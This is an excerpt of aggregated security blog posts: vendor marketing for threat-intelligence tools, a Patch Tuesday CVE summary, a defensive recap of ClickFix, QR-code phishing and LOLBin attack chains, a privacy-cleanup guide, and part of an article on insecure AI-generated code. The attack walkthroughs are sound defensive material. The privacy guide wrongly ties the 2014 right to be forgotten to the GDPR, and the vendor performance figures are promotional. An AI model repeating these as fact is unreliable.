  • TI Lookup enriches alerts with threat context, including TTPs and additional indicators so teams prioritize based on actual risk

3. Cuts Labor Costs with Automated Triage 

ANY.RUN’s TI solutions can be implemented into existing workflows

Manual threat triage is one of the biggest hidden expenses in cybersecurity. Analysts stuck in repetitive, low-value tasks burn out and cost more in overtime and turnover. Delayed responses increase breach risks and force costly retraining. 

Thanks to plug-and-play integrations and API/SDK support, ANY.RUN’s TI solutions connect seamlessly with SOCs’ current software and enhance existing workflows. This reduces unnecessary escalations from Tier 1 to Tier 2 analysts, cutting labor costs and increasing the alert handling capacity without extra hiring. 

How ANY.RUN Helps

  • TI Lookup can be used to automatically enrich alerts and artifacts, reducing triage time to seconds and giving analysts the context they need to act independently
  • TI Feeds stream live IOCs via STIX/TAXII directly into SIEM/SOAR/firewall/EDR and other solutions, eliminating manual data entry

Introduce TI Feeds into your ecosystem 
Expand threat detection and improve SOC metrics  


Request access to TI Feeds


4. Accelerates Response to Minimize Financial Fallout 

Threat intelligence from ANY.RUN can be traced to sandbox analyses for full attack view 

Every minute counts during a cyber incident. Slow detection and response prolong downtime and amplify financial losses, from regulatory fines to customer churn. Organizations without real-time, context-rich TI often struggle to collect actionable insights, delaying critical decisions and letting attacks spread unchecked. 

ANY.RUN’s TI Lookup provides instant, deep context, including a full attack view based on a single indicator, so teams can quickly understand the threat they are dealing with and respond decisively without guesswork. Faster responses limit damage, preserve revenue, and protect customer trust, turning potential crises into manageable events. 

How ANY.RUN Helps

  • TI Lookup provides sandbox detonation context for threats, so SOCs can see how malware acts on a real system and use the findings to contain it in their infrastructure
  • TI Feeds supply links to sandbox reports for each indicator, which immediately provides security teams with full visibility into the detected threat’s actions. 

Catch attacks early with instant IOC enrichment in TI Lookup
Power your response and proactive defense with data from 15K SOCs 



Request trial for your team


5. Keeps SOCs Up-to-date on Evolving Threats without Manual Work 

TI Lookup provides fresh indicators for the threats active right now  

Cyber threats evolve daily, but most TI feeds update weekly or monthly, leaving gaps that attackers exploit. Organizations stuck with static, generic IOCs are forced into reactive, costly fixes every time a new attack emerges. This approach poses a direct financial risk, increasing the likelihood of malware slipping through outdated defenses. 

ANY.RUN’s TI Feeds update continuously with data from live investigations by 500,000 security analysts, ensuring defenses adapt automatically to new threats. TI Lookup’s MITRE ATT&CK integration helps teams anticipate attacker moves, turning security from a cost center into a strategic advantage. 

How ANY.RUN Helps

  • TI Feeds are continuously updated in real time, delivering 99% unique IOCs, so SOCs can stay ahead of emerging threats and detect attacks that are missed by other tools. 
  • TI Lookup’s Query Updates help SOCs to get new indicators and samples for threats of their interest to keep up with evolving infrastructure and enrich proactive defense

Success Story: International Transport Company 

Challenge 

A transportation company faced constant cyber threats, especially through email phishing and malware attacks. Attackers frequently changed their infrastructure, making it hard to track and block threats in time. The security team struggled to manually monitor evolving attacks, which risked exposing sensitive communications and disrupting operations. 

Solution 

The company used ANY.RUN’s Threat Intelligence Lookup to automate threat tracking. They set up custom search queries for specific threats like geo-targeted attacks, CVEs, and phishing domains and subscribed to real-time updates. This allowed them to focus on active threats, convert new threat data into detection rules, and respond faster without manual searches. 

Results 

  • Faster Threat Detection: Automated alerts helped the team spot and block attacks like phishing and malware campaigns before they caused damage. 
  • Better Resource Use: The team saved time by reducing manual research, letting them focus on high-priority threats and improve overall security. 
  • Proactive Defense: Real-time updates on active threats allowed the company to strengthen defenses and stay ahead of attackers.. 

Conclusion

Threat intelligence solutions like ANY.RUN’s TI Feeds and TI Lookup both improve security and deliver measurable cost savings, resource optimization, and risk reduction. By automating triage, eliminating false positives, and accelerating response, businesses can: 

  • Avoid breach-related costs (downtime, fines, reputation damage). 
  • Cut labor expenses (overtime, hiring, turnover). 
  • Optimize security budgets (focus on high-impact threats). 
  • Future-proof defenses (adapt to evolving attacks). 

About ANY.RUN   

ANY.RUN is built to help security teams detect threats faster and respond with greater confidence. Our Interactive Sandbox delivers real-time malware analysis and threat intelligence, giving analysts the clarity they need when it matters most.    

With support for Windows, Linux, and Android environments, our cloud-based sandbox enables deep behavioral analysis without the need for complex setup. Paired with Threat Intelligence Lookup and TI Feeds, ANY.RUN provides rich context, actionable IOCs, and automation-ready outputs, all with zero infrastructure burden.   

Start your 14-day trial now →   

The post 5 Ways Threat Intelligence Saves Businesses Money and Resources  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Microsoft Patch Tuesday for October 2025 — Snort rules and prominent vulnerabilities

Microsoft Patch Tuesday for October 2025 — Snort rules and prominent vulnerabilities

Microsoft has released its monthly security update for October 2025, addressing 175 Microsoft CVEs and 21 non-Microsoft CVEs. Among these, 17 vulnerabilities are considered critical and 11 are flagged as important and considered more likely to be exploited. Current intelligence shows that three of the important vulnerabilities have already been detected in the wild.

In the following notes we provide a concise overview of the most significant issues, focusing on the vulnerabilities that could impact the widest user base or carry the highest severity.

Exploited in the Wild

Three vulnerabilities were confirmed to have been exploited in the wild.

CVE‑2025‑24990: Windows Agere Modem Driver Elevation of Privilege Vulnerability
Microsoft identified a flaw in the third‑party Agere Modem driver that ships with supported Windows operating systems. The driver was permanently removed in the October cumulative update. Users who rely on fax modem hardware that depends on this driver should uninstall any remaining components, as the affected driver is no longer supported.

CVE‑2025‑59230: Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
An improper access‑control check in Windows Remote Access Connection Manager allows an authorized attacker to gain elevated local privileges when accessing the service.

CVE‑2025‑47827: Secure Boot Bypass in IGEL OS before 11
This vulnerability permits a crafted root file-system to bypass Secure Boot on IGEL OS versions before 11 due to incorrect cryptographic signature verification performed by the igel-flash-driver module.

Critical Vulnerabilities

Microsoft marked 17 vulnerabilities as critical in this release. While these have not been observed exploited in the wild, their severity warrants prompt remediation.

CVE‑2025‑59287 Windows Server Update Service (WSUS) Remote Code Execution Vulnerability – Deserialization of untrusted data in WSUS allows an attacker to remotely execute code, potentially compromising the update service on vulnerable servers.

CVE‑2025‑59246, CVE‑2025‑59218  Azure Entra ID Elevation of Privilege Vulnerabilities – An attacker could exploit Azure Entra ID to elevate privileges, affecting the identity platform’s access control.

CVE‑2025‑0033 RMP Corruption During SNP Initialization – A race condition during Reverse Map Table initialization in AMD EPYC SEV‑SNP processors can allow a hypervisor with privileged control to modify RMP entries before they are locked. Azure Confidential Computing products contain multiple safeguards to prevent host compromise.

CVE‑2025‑59234 Microsoft Office Remote Code Execution Vulnerability – A use‑after‑free bug in Microsoft Office enables an attacker to execute code locally on an affected system, contingent on the presence of vulnerable content.

CVE‑2025‑49708 Microsoft Graphics Component Elevation of Privilege Vulnerability – An unauthenticated network attacker can manipulate the Graphics component through use‑after‑free logic to elevate privileges on a target machine.

CVE‑2025‑59291 Confidential Azure Container Instances Elevation of Privilege Vulnerability – External control of file names or paths in Confidential Azure Container Instances allows a privileged attacker to elevate privileges locally within the container environment.

CVE‑2025‑59292 Azure Compute Gallery Elevation of Privilege Vulnerability – Misuse of file names or paths can enable a privileged attacker to gain elevated rights in an Azure Compute Gallery context.

CVE‑2025‑59227 Microsoft Office Remote Code Execution Vulnerability – Exploitation of this vulnerability would allow remote execution on Office applications across multiple Windows versions.

CVE‑2025‑59247 Azure PlayFab Elevation of Privilege Vulnerability – PlayFab services can be manipulated by an unauthorized actor to elevate privileges, impacting the underlying Azure infrastructure.

CVE‑2025‑59252, CVE‑2025‑59272, CVE‑2025‑59286 Copilot Spoofing Vulnerabilities – Improper sanitization and encoding of user‑supplied data in Microsoft 365 Copilot leads to spoofing attacks.

CVE‑2025‑59271 Redis Enterprise Elevation of Privilege Vulnerability – Redis Enterprise servers may allow privileged escalation through a configuration oversight, impacting managed Azure Redis services.

CVE‑2025‑55321 Azure Monitor Log Analytics Spoofing Vulnerability – Cross‑site scripting (XSS) in Azure Monitor allows a network attacker to perform spoofing attacks within the Log Analytics portal.

CVE‑2025‑59236 Microsoft Excel Remote Code Execution Vulnerability – An unauthorized attacker could trigger a use‑after‑free in Microsoft Excel, causing local code execution on the target system.

CVE‑2016‑9535 LibTIFF Heap Buffer Overflow – The libtiff library contains a heap‑buffer‑overflow that can be triggered by malformed TIFF files, potentially allowing an attacker to execute arbitrary code under the user context.

Talos would also like to highlight 11 important vulnerabilities were considered more likely to be exploited: CVE‑2025‑48004CVE‑2025‑24052, CVE‑2025‑55676CVE‑2025‑55681, CVE‑2025‑58722CVE‑2025‑59199CVE‑2025‑55680CVE‑2025‑55692CVE‑2025‑55693CVE‑2025‑55694 and CVE‑2025‑59194. They range from remote code execution to privilege escalation across both desktop and cloud environments.

Security teams are encouraged to examine the detailed advisory documents for each CVE to understand the exact scope and mitigations. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are:  65391 – 65410, 64420 – 65422.

The following Snort 3 rules are also available: 301325 – 301334.

Cisco Talos Blog – ​Read More

New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs

Recently, we have hosted a webinar exploring some of the latest malware and phishing techniques to show how interactive analysis and fresh threat intelligence can help SOC teams stay ahead.

ANY.RUN’s experts depicted the evolving landscape of malware tactics, highlighted real-world examples of sophisticated attacks, and provided practical detection tips for analysts.  
 
You can watch the session on ANY.RUN’s YouTube channel or read our quick recap below.  

Join us on social media not to miss new event announcements: LinkedIn; X.com, Discord.  

Key Takeaways 

  1. QR Code Threats are Evolving: Phishkit attacks increasingly use QR codes to evade detection, as many security solutions still cannot adequately scan and analyze QR code content. 
  1. Interactive Analysis is Critical: Traditional automated tools fail against sophisticated attacks like ClickFix that require human interaction to fully execute. SOC teams need sandbox environments capable of manual navigation through CAPTCHAs and multi-stage social engineering attacks. 
  1. System Binaries are Attack Vectors: Living Off the Land Binary (LOLBin) abuse allows attackers to hide malicious activities within trusted system processes like PowerShell and mshta.exe, making detection extremely challenging without advanced behavioral analysis. 
  1. Real-Time Threat Intelligence is Essential: Access to current, actionable intelligence from global SOC investigations can reduce mean time to response by up to 21 minutes per case and provide crucial context for suspicious activities. 
  1. Automation Reduces Analyst Burden: Strategic automation can decrease Tier 1 case loads by up to 20% and reduce escalations to senior analysts by 30%, allowing teams to focus on high-value threat hunting and response activities. 

The Growing Challenge: New Techniques, Low Detection Rates 

Low detection rates remain a critical issue for SOC teams. As attackers employ new evasion techniques, missed threats can lead to severe infrastructure damage, asset compromise, and reputational harm.  

Why detection rates can be disappointing 

The webinar covered three key tactics: ClickFix attacks using steganography payloads, phishing kits with Tycoon2FA‘s new evasion chain, and Living Off the Land Binaries (LOLBins) in DeerStealer attacks. 

Establishing Fast Detection and Proactive Defense with ANY.RUN 

Interactive Sandbox streamlines detection of malware and phishing with live analysis 

Attackers are relentless in refining their malware and phishing tactics, but SOC teams can fight back effectively with the right solutions. By combining hands-on interactive analysis, automation, and shared threat intelligence, ANY.RUN helps SOCs cut through alert noise, accelerate detection, and strengthen proactive defense. 

Organizations implementing advanced detection strategies should track several key metrics to measure success: 

  • Detection Rate Improvement: 88% of threats become visible within 60 seconds of analysis. 
  • Mean Time to Response Reduction: Advanced detection reduces MTTR by up to 21 minutes per case. 
  • Escalation Reduction: Effective training and services can reduce escalations from Tier 1 to Tier 2 analysts by 30%. 
  • Overall Performance Multiplier: Some organizations report up to 3x better performance. 

Reduce MTTR and minimize risks with ANY.RUN’s solutions
Request a quote or trial for your SOC  



Contact us


Three Critical Attack Vectors Demanding Attention 

1. ClickFix Attacks: The Steganography Challenge 

Key TTPs of ClickFix attacks 

ClickFix represents one of the most insidious social engineering attacks currently targeting organizations. This technique leverages fake error messages and CAPTCHA challenges to trick users into manually executing malicious PowerShell commands through clipboard hijacking. 

The attack typically begins with phishing emails or compromised websites that present users with seemingly legitimate verification processes. The sophisticated nature of these attacks lies in their multi-layered deception: 

  • Double Spoofing: Attackers create fake versions of trusted websites (such as booking platforms) and combine them with convincing CAPTCHA challenges. 
  • Manual Execution Requirement: The attack only proceeds when users manually follow instructions, making it extremely difficult for automated systems to detect. 
  • Clipboard Manipulation: Malicious commands are silently copied to the user’s clipboard without notification. 
  • Social Engineering: Users are instructed to paste and execute clipboard contents through system dialog boxes. 

We can see these TTPs in action by analyzing a ClickFix sample in the Sandbox.  

A user is required to click through a (fake) CAPTCHA — this is where most automated tools will stumble thus missing the threat, but ANY.RUN’s Sandbox interactivity allows to solve the task.  

Forged Booking.com page with a fake CAPTCHA 

Upon the click on the CAPTCHA, a malicious command is copied to the user’s clipboard without any notification. It is a PowerShell script:  

Malicious command captured by the Sandbox

  

A popup appears next, directing the user to run the command.  

Sandbox running the PowerShell command for a user 

The process tree in the Sandbox allows us to view the entire event chain from the initial command execution to the final payload. 
 
Once executed, ClickFix attacks can deploy various malware types, including Lumma Stealer, AsyncRAT, and ransomware. The technique’s effectiveness stems from its ability to bypass traditional detection mechanisms that cannot simulate human interaction or navigate through interactive elements like CAPTCHAs. 

Detect threats faster with ANY.RUN’s Interactive Sandbox
See full attack chain in seconds for immediate response 



Get started with business email


In our case, the attack has delivered not only AsyncRAT, but also DCRAT. The Sandbox tells us that it has created files in the startup directory. This is a standard persistence mechanism that allows the malware to continue working even after a system reboot. 

The sandbox tells us that it has created files in the startup directory.  

This is a standard persistence mechanism that allows the malware to continue working even after a system reboot. 

DCRAT deployment in the process tree 

Detection of ClickFix attacks requires interactive analysis capabilities that can replicate human behavior in a controlled environment. Traditional automated scanning tools will typically fail at the CAPTCHA stage, leaving the threat undetected and potentially allowing it to reach end users. 

To see variants of ClickFix attacks with varying scenarios and payloads and gather IOCs for detection rules, query the technique in ANY.RUN’s Threat Intelligence Lookup. The data comes from sandbox analyses of over 15,000 SOC teams around the world who investigate real-world recent incidents.    

threatName:”ClickFix” 

ClickFix sandbox analyses found via TI Lookup 

2. PhishKit Attacks: Advanced Evasion Through QR Code Obfuscation 

Why phishkits are dangerous 

Phishkit attacks represent a significant evolution in phishing campaign sophistication. These pre-packaged toolkits, often sold on dark web marketplaces, enable even unskilled attackers to create highly convincing phishing campaigns that mimic trusted brands like Microsoft, Google, and other major service providers. 

The latest iterations of phishkit attacks incorporate several advanced evasion techniques:  

  • QR Code Integration: Malicious links are embedded within QR codes in PDF attachments, often styled to appear as legitimate DocuSign documents. 
  • Mobile Device Targeting: QR codes naturally direct victims to mobile devices, where phishing indicators may be less visible on smaller screens. 
  • Multi-Stage Human Interaction Checks: Attacks include various verification steps designed to evade automated analysis. 
  • AI-Generated Content: Some variants use artificial intelligence to create more convincing phishing content. 

In spite of the anti-evasion techniques, ANY.RUN’s Sandbox can automatically detonate these attacks. Automated Interactivity handles this without analysts’ manual effort: view an analysis.  

Phishing email with a malicious attachment: the Sandbox clicks the links

In the Actions section, we can see the steps the Sandbox performed to detonate each attack stage. The attack begins with an email that has a pdf attachment styled to appear as a legitimate DocuSign document.   
 
The document contains a QR code: a common trick in phishing attacks these days that can be very effective. First, it lets attackers avoid detection because many security solutions still cannot scan QR codes. Second, most people use mobile devices to scan codes, so the attack further unfolds on a smaller screen making it harder to spot signs of phishing.   
 
The Sandbox extracts the link from the QR code, follows it to a page with a Cloudflare Turnstile CAPTCHA, and solves the CAPTCHA. The final stage of the kill chain is a very convincing fake Microsoft 365 login page designed to steal credentials.  

Popular phishkits like Tycoon2FA and Mamba2FA have been linked to sophisticated threat groups, including Storm-1747, demonstrating the organized nature of these campaigns. The QR code obfuscation technique is particularly effective because many security solutions still cannot adequately scan and analyze QR codes for malicious content. 

To find more samples of phishkit attacks employing QR codes and targeting companies in your location, use the following TI Lookup request (replace Spain’s country code by your own): 

threatName:”qrcode” and threatName:”phishing” AND submissionCountry:”es” 

Phishing campaigns targeting Spanish users and containing a QR code 

Effective detection requires systems capable of: 

  • Automatically extracting and analyzing URLs from QR codes. 
  • Solving various CAPTCHA challenges without human intervention. 
  • Following multi-stage attack chains to their ultimate payload. 
  • Identifying sophisticated phishing page designs that closely mimic legitimate services. 

ANY.RUN’s customers report that the autonomous interactive analysis in the Sandbox brings the total case load for L1s down by up to 20%.   

3. Living Off the Land Binaries (LOLBins): Exploiting System Trust  

LOLBin attacks: key tactics 

The abuse of Living Off the Land Binaries represents one of the most challenging detection scenarios for SOC teams. This technique involves hijacking legitimate Windows system utilities such as PowerShell, mshta.exe, and cmd.exe to execute malicious activities while blending with normal system processes. LOLBin abuse is particularly effective due to: 

  • Legitimate Process Masquerading: Malicious activities appear to originate from trusted system binaries. 
  • Antivirus Evasion: Many security solutions whitelist system utilities, allowing malicious commands to execute undetected. 
  • Environmental Consistency: Attacks use tools that exist in every Windows environment, ensuring compatibility. 
  • Reduced Forensic Footprint: Activities may be harder to distinguish from legitimate administrative tasks. 

Let’s observe an example of a typical LOLBin attack. 

LOLBin phishing attack with a fake .link 

It might begin with a malicious .lnk file that executes mshta.exe through PowerShell to download executable files from remote servers. The attack chain often includes decoy actions (such as downloading legitimate PDF files) to distract from the real malicious payload delivery.  

ANY.RUN’s script tracer shows a .pdf and a malware file downloads 

We can see how the malware first downloads a .pdf file as a way to distract analysts, a moment later it downloads the final payload and executes it. 

A stealer is delivered at the final stage of killchain 

In this attack, the payload is DeerStealer, which can steal sensitive information and establish persistent access to compromised systems. The challenge for SOC teams lies in distinguishing between legitimate system administration activities and malicious abuse of the same tools. 
 
The biggest problem with LOLBin abuse is that it’s hard to spot once the infection takes place. In the example above, the script connects to an external server to download the payload, and this activity would be spotted by detection systems.   

But an analyst might see it as a false positive because there’s no context for what happened after the connection. The context linking indicators to real incidents for fast, free of false-positives threat detection, SOC teams can leverage ANY.RUN’s Threat Intelligence Feeds.  

Threat Intelligence Feeds: data source, integration options

TI Feeds is a continuous stream of actionable network IOCs straight to SIEM, XDR, or SOAR systems, and helps SOC teams detect and block threats as soon as they emerge in malware samples. Just like TI Lookup, TI Feeds derives data from the latest sandbox investigations of 15,000 SOC teams around the world.   

This approach provides malicious IPs, domains, and URLs that have been active for no more than several hours and can still be used to detect attacks that are happening right now.  All IOCs are linked to sandbox analysis sessions with all the telemetry and behavior data.  

Conclusion 

ClickFix attacks, advanced PhishKits, and LOLBin abuse represent just a few examples of the challenges facing modern SOC teams. 

Success in this environment requires a comprehensive approach that combines interactive analysis capabilities, current threat intelligence, and strategic automation. Organizations that invest in these capabilities see measurable improvements in detection rates, response times, and overall security posture. 

About ANY.RUN  

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.   
 
With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premise systems. Combined with TI Lookup, YARA Search, and TI Feeds, we equip businesses to speed up investigations, reduce security risks, and improve teams’ efficiency. 

The post New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Your anti-OSINT guide: hunting down and deleting everything about you on the internet that you can possibly reach | Kaspersky official blog

It’s frankly concerning just how much online services — and people we’ve never met — know about us. In fact, most of this data lands online because of us: the average internet user has dozens of accounts — if not hundreds.

That’s why doing a vanity search on yourself is so useful and eye-opening. Think about it: your digital footprint has been building up for years. Social media, message boards, old marketplace listings — everything you’ve ever typed is just sitting there, waiting to go off like a ticking time bomb.

Carelessly posted photos, videos, or even old comments have been known to go viral years later, causing serious retroactive problems for the poster. You might be thinking, “Who’d even care about me?” Well, trust us, plenty of folks would. This ranges from angry exes, advertisers, and scammers, all the way to potential employers and government agencies. HR departments routinely deep-dive into candidates’ histories before hiring. Furthermore, data found by using shadowy services that search for information leaked in data breaches is frequently used for doxing and harassment.

So, if you don’t manage it, your digital footprint can unexpectedly come back to bite you. Sure, it’s impossible to erase it completely, but you can certainly try to minimize the amount of information available to everyone. Today, we talk about how to scrub your digital footprint without sliding into full-blown paranoia. (Actually, we’ve got a few extra tips tucked away for the truly paranoid among you too!)

Start by googling yourself regularly

First things first: enter your first name and surname, email address, and main usernames into a search engine and see what pops up. Beyond doing manual searches, there are several useful tools that can help you find your account details across dozens, if not hundreds, of services and sites — most of which you’ve probably forgotten about. Some examples:

  • Namechk is a service designed to check the availability of usernames across more than 90 social networks.
  • Web Cleaner lets you search for yourself across dozens of search engines without having to manually enter the query into each one. What doesn’t show up in Google might easily be discovered on Bing, Yahoo, and others.

Why egosurf? By searching for yourself, you’ll first see exactly where you once registered (and perhaps forgot about), and second, you’ll be able to check for any fake or impersonating accounts using your name. If you do find an imposter account, contact the website’s support team and demand they remove the fake profiles. Be prepared to verify your identity to the support agent, but remain vigilant: there’s a risk of phishing scams that exploit the KYC (Know Your Customer) verification process.

Get rid of old accounts and posts

Once you’ve dealt with the fake accounts and compiled a list of your genuine ones, it’s time to delete the superfluous and outdated ones. The fewer dead accounts online holding your personal data, the better. Don’t rely entirely on the initial search or your own memory. Dig deep into your email archives to see which sites and services message you as their user. You can also review the list of saved passwords in your browsers or password managers.

I once discovered an account I made — on a gun forum, of all things — which I’d used only once to message another member. While those specific details might not have made me easier to hack, an attacker could easily have extracted the password from that old, likely vulnerable message board platform. If I had reused that password elsewhere, I’d be in trouble. This is exactly why you should set up a unique password for every new account and store it securely in a reliable app.

To quickly tackle old accounts, check out the open-source service Just Delete Me. It even has browser extensions for Chrome and Firefox. This tool shows how easy or difficult it is to delete your information on specific websites, helping you decide if the effort is worth the reward.

Dealing with shadow profiles

Unfortunately, the accounts you’ve registered are only half the battle. Sometimes social media sites generate shadow profiles containing data on you that may persist even after you delete your account. These profiles can include information you never directly shared with the service. For example, you might have granted the Facebook app access to your phone contacts without ever importing them into your account. All the data from your address book could end up in that shadow profile.

Even more unsettling, sometimes these accounts get created for users who’ve never even registered with the service, by gathering data from other platforms and open sources. While it’s nearly impossible to completely prevent shadow profiles from being created, you can definitely minimize the damage. Go through your old apps, and revoke their access to your sensitive data — things like your camera, photos, contacts, location, and so on. Going forward, meticulously monitor which permissions you grant to each new app.

If you discover that your Google, Apple or social media accounts are still linked to a third-party service you haven’t used in ages, go ahead and unlink them. These old connections always increase your risk of a data breach or leak.

Invoke your right to be forgotten

If your searches turn up links to compromising or false information about you, you can utilize your right to be forgotten. This right was established in Europe in 2014 with the introduction of the GDPR, and similar concepts exist in other countries.

Submit a request using the dedicated forms provided by search engines. Google, Bing, and others have these available online. Some search engines lack a transparent mechanism for removing personal data, so for those, you can try reaching out through their customer support chat.

While this cleanup of search results won’t actually remove the data from the original website, it will make the information significantly harder for the average person to find. If you need the actual data deleted, you must contact the owners of the websites where the information is posted. The service who.is can help here: it will show you whose name the domain is registered to. From there, it’s old-school OSINT: search for the site creator on social media, reach out privately, and try to negotiate a removal. If a friendly approach fails, you may need to use your country’s legal system as leverage.

Set up data breach notifications

Data leaks happen online virtually every day, exposing massive amounts of personal data: IP addresses, names, phone numbers, email addresses, payment info, and much more. Websites like Have I Been Pwned allow you to enter your email and get alerts if it shows up in a new leaked database.

However, for a comprehensive approach and greater convenience, it’s best to monitor leaks through Kaspersky Premium — we search for breaches using both email addresses and phone numbers. You can add all your email addresses and phone numbers (for yourself and your family) and be confident that we’ll warn you about a breach almost immediately, thanks to the Kaspersky Security Network (KSN) — our global threat intelligence infrastructure.

Unfortunately, preventing leaks single-handedly is an impossible task for the average user. So, the best defense is to limit how much personal data you share when registering new accounts.

Check internet archive services

Perhaps the most popular of these services is archive.org. Information you’ve deleted from other places might still be stored here, as the service takes snapshots of web pages and keeps them even after the original site is taken down.

Send an email to info@archive.org. Include the specific URL you want removed and specify the time period you wish to exclude from the archive. To ensure the data is deleted, explain your situation in detail. Clearly state that your personal data was posted without your consent.

Clean up your inbox

An email inbox overflowing with old messages that contain private information is also part of your digital footprint. Go through your mail using keywords like “password”, “SSN”, or “account”, and delete any emails containing this sensitive data. Unsubscribe from old mailing lists. This lowers the chance that your email address will leak from a marketer’s database. To safeguard the emails you need and to spot phishing attempts in time, use Kaspersky Premium.

Erase local traces

Don’t forget to regularly — at least once a month — clear your browser history, cookies, and cache on all your devices. Alternatively, set up your browser to clear this data automatically when you close it. This lessens the chance of an outsider collecting information from your device if they gain access to it.

On smartphones, you should disable or periodically reset your advertising identifier. Both Android and iOS privacy settings have options for this, which we discussed in detail in our post How smartphones build a dossier on you.

Review your privacy settings

If we were to break down all the privacy settings for every popular service, we’d need an entirely separate blog for that. Wait a second… we have one! The easiest way to check and adjust your privacy and security settings is through our free service, Privacy Checker. It will guide you on how to configure popular social platforms, services, and even operating systems to your desired level of privacy — ranging from the “Who cares about me?” mindset to the “Everyone is watching me” level.

Erase your nudes

If you find your intimate photos circulating online, or if an extortionist is threatening to share them with your contacts, don’t panic. Immediately reach out to StopNCII.org. And next time, only send intimate content to people you absolutely trust. Use secure messaging apps that offer an auto-delete feature for messages. When taking intimate photos, do so in a way that makes it impossible to identify you.

The “paranoid mode” bonus for the truly anxious

  • If you want to leave no trace on the internet whatsoever, be ready to go fully offline, or at least severely restrict your digital life. This means no social media under your real name, and an absolute minimum of online services — only the essentials. For details on how to safely restrict your gadget usage, check out our post Digital detox: How to take a safe break from screens.
  • Use messaging apps that feature end-to-end encryption and self-destructing messages. For search, use DuckDuckGo or Tor: that way your queries aren’t tied back to you. Ditch Gmail for encrypted email services that don’t require a phone number, like Temp Mail or Proton Mail. For smartphones, use a completely open OS that isn’t tied to Google/Apple (like GrapheneOS).
  • To leave minimal digital tracks, rely on virtual machines running Whonix or Tails OS.
  • If you know how to work with scripts, you can use them to fully purge your comments from social networks. Open-source scripts exist for platforms like Discord, Reddit, and Telegram.
  • If you aren’t satisfied with half-measures, you can declare war on data brokers. These firms collect all available data about you to create a digital dossier, which they then sell. We detail who these brokers are and how to fight them in our post Why data brokers build dossiers on you, and how to stop them doing so.
  • Finally, create multiple online personas: this is a radical but effective way to confuse data collectors. Use different names, birth dates and emails for different spheres of your life. Invent a separate alter ego for professional activity (with a clean résumé and neutral posts), and another for personal communication. The less the internet can tie your various activities together, the better for your privacy.

Ready for a safer digital life? We have a few more useful tips for you:

Kaspersky official blog – ​Read More

Security risks of vibe coding and LLM assistants for developers

Although the benefits of AI assistants in the workplace remain debatable, where they’re being adopted most confidently of all is in software development. Here, LLMs play many roles — from refactoring and documentation, to building whole applications. However, traditional information security problems in development are now compounded by the unique vulnerabilities of AI models. At this intersection, new bugs and issues emerge almost weekly.

Vulnerable AI-generated code

When an LLM generates code, it may include bugs or security flaws. After all, these models are trained on publicly available data from the internet — including thousands of examples of low-quality code. A recent Veracode study found that leading AI models now produce code that compiles successfully 90% of the time. Less than two years ago, this figure was less than 20%. However, the security of that code has not improved — 45% still contains classic vulnerabilities from the OWASP Top-10 list, with little change in the last two years. The study covered over a hundred popular LLMs and code fragments in Java, Python, C#, and JavaScript. Thus, regardless of whether the LLM is used for “code completion” in Windsurf or “vibe coding” in Loveable, the final application must undergo thorough vulnerability testing. But in practice this rarely happens: according to a Wiz study, 20% of vibe-coded apps have serious vulnerabilities or configuration errors.

As an example of such flaws, the case of the women-only dating app, Tea, is often used, which became notorious after two major data leaks. However, this app predates vibe coding. Whether AI was to blame for Tea’s slip-up will be determined in court. In the case of the startup Enrichlead, though, AI was definitely the culprit. Its founder boasted on social media that 100% of his platform’s code was written by Cursor AI, with “zero hand-written code”. Just days after its launch, it was found to be full of newbie-level  security flaws — allowing anyone to access paid features or alter data. The project was shut down after the founder failed to bring the code up to an acceptable security standard using Cursor. However, he remains undeterred and has since started new vibe-coding-based projects.

Common vulnerabilities in AI-generated code

Although AI-assisted programming has only existed for a year or two, there’s already enough data to identify its most common mistakes. Typically, these are:

  • Lack of input validation, no sanitization of user input from extraneous characters, and other basic errors leading to classic vulnerabilities such as cross-site scripting (XSS) and SQL injection.
  • API keys and other secrets hardcoded directly into the webpage, and visible to users in its code.
  • Authentication logic implemented entirely on the client side, directly in the site’s code running in the browser. This logic can be easily modified to bypass any checks.
  • Logging errors — from insufficient filtering when writing to logs, to a complete absence of logs.
  • Overly powerful and dangerous functions — AI models are optimized to output code that solves a task in the shortest way possible. But the shortest way is often insecure. A textbook example is using the eval function for mathematical operations on user input. This opens the door to arbitrary code execution in the generated application.
  • Outdated or non-existent dependencies. AI-generated code often references old versions of libraries, makes outdated or unsafe API calls, or even tries to import fictitious libraries. The latter is particularly dangerous because attackers can create a malicious library with a “plausible” name, and the AI agent will include it in a real project.

In a systematic study, the authors scanned AI-generated code for weaknesses included in the MITRE CWE Top 25 list. The most common issues were CWE-94 (code injection), CWE-78 (OS command injection), CWE-190 (integer overflow), CWE-306 (missing authentication), and CWE-434 (unrestricted file upload).

A striking example of CWE-94 was the recent compromise of the Nx platform, which we covered previously. Attackers managed to trojanize a popular development tool by stealing a token enabling them to publish new product versions. The token theft exploited a vulnerability introduced by a simple AI-generated code fragment.

Dangerous prompts

The well-known saying among developers “done exactly according to the spec” also applies when working with an AI assistant. If the prompt for creating a function or application is vague and doesn’t mention security aspects, the likelihood of generating vulnerable code rises sharply. A dedicated study found that even general remarks like “make sure the code follows best practices for secure code” reduced the rate of vulnerabilities by half.

The most effective approach, however, is to use detailed, language-specific security guidance referencing MITRE or OWASP error lists. A large collection of such security instructions from Wiz Research is available on GitHub; it’s recommended to add them to AI assistants’ system prompts via files like claude.md, .windsurfrules, or similar.

Security degradation during revisions

